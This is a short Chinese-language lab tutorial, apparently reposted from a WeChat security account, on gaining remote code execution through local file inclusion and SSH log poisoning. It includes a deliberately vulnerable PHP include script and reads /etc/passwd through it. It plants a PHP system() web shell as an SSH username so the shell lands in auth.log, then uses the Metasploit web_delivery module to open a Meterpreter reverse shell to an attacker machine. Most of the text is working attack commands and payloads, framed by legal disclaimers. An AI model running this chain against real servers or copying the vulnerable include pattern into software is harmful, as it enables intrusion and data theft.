此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
攻击者:Kali Linux
目标:Ubuntu
开始吧!
创建一个 PHP 文件,允许用户通过文件参数包含文件。因此,使用文件参数我们可以执行包含恶意代码的文件,从而对目标 PC 进行未经授权的访问。
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
cd /var/www/html
mkdir lfi
mv /home/raj/Desktop/lfi.php。
localhost/lfi/lfi.php?file=/etc/passwd
ssh user@192.168.1.129
tail -f /var/log/auth.log
cd /var/log/
chmod 775 auth.log
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
ssh'<?php system($_GET['c']); ?>'@192.168.1.129
再次检查其日志时,您会发现 PHP 代码已添加了新日志。
键入以下命令来查看其日志:
tail -f /var/log/auth.log
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
msf exploit(web_delivery)>sessions 1
meterpreter> sysinfo
原文始发于微信公众号(三沐数安):带有 LFI 和 SSH 日志中毒的 RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论